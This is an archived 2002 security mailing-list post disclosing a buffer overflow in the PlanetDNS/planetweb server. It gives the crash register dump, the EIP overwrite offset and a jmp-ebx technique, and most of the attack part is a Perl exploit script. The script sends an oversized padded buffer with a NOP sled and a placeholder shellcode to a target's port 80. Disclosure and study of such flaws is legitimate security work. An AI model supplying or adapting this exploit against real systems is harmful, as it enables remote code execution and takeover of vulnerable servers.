New buffer overflow in PlanetDNS

From: securma massine (securmaat_private)
Date: Fri Oct 18 2002 - 10:03:39 PDT

Next message: Samuel Tardieu: "Microsoft Windows Media Player for Sparc/Solaris vulnerability"

Previous message: guejez: "[VulnWatch] SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

hi 
planetdns ( http://www.planetdns.net)is 
commercial software package that allows to
turn computer into an Internet server. 
and be able to create an Internet Name, connect to 
a web server, FTP, mail server, etc. running
on computer.
planetdns is vulnerable has a buffer overflow with a 
overwrite of eip (never posted before )... one already 
notified that a number of 1024 byte could crasher the 
server, and I found that while sending (without GET/)un of 
6500 byte could thus make a overwrite eip of execution of a 
shellcode, the overwrite is done with byte 6449, 50, 51, 
52. 
one notices of aillor that ebx and always 4byte before the 
eip the ret address will be thus a jmp ebx or call ebx that 
one finds in many modules charged .
I realised an exploit tested on plaetweb v1.14 and who 
gives L state of the following registers:
Access violation - code c0000005 (first chance)
eax=0217dfb0 ebx=0217ffdc ecx=43434343 edx=7846f5b5 
esi=0217dfd8 edi=00000000
eip=43434343 esp=0217df18 ebp=0217df38 iopl=0 nv up 
ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b 
gs=0000 efl=00000246
43434343 ?? ???
exploit code:
#!/usr/bin/perl -w
#tool bop.pl
# buffer overflow tested against plaetweb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (specialemet 
christal...plus tu pédales moins fort, moins tu #avances 
plus vite..)
# 

use IO::Socket;
if ($#ARGV<0)
{
 print "\n write the target IP!! \n\n";
 exit;
}

$shellcode = 
("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");#ad
d your favorit shellcode
$buffer = "A"x6444;
$ebx = "\x90\xEB\x08\x90";# you have the chance because ebx 
= eip - 4 bytes jmp short 0xff x0d3
$ret = "\x43\x43\x43\x43";# insert your ret address with 
(jmp ebx or call ebx)
$minibuf ="\x90\x90\x90\x90";# will be jumped by EB08
$connect = IO::Socket::INET ->new (Proto=>"tcp", 
PeerAddr=> "$ARGV[0]",
PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n"; 

_________________________________________________________ 
Gagnes une PS2 ! Envoies un SMS avec le code PS au 61166
(0,34€ Hors coût du SMS)

Next message: Samuel Tardieu: "Microsoft Windows Media Player for Sparc/Solaris vulnerability"
Previous message: guejez: "[VulnWatch] SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Oct 18 2002 - 10:03:41 PDT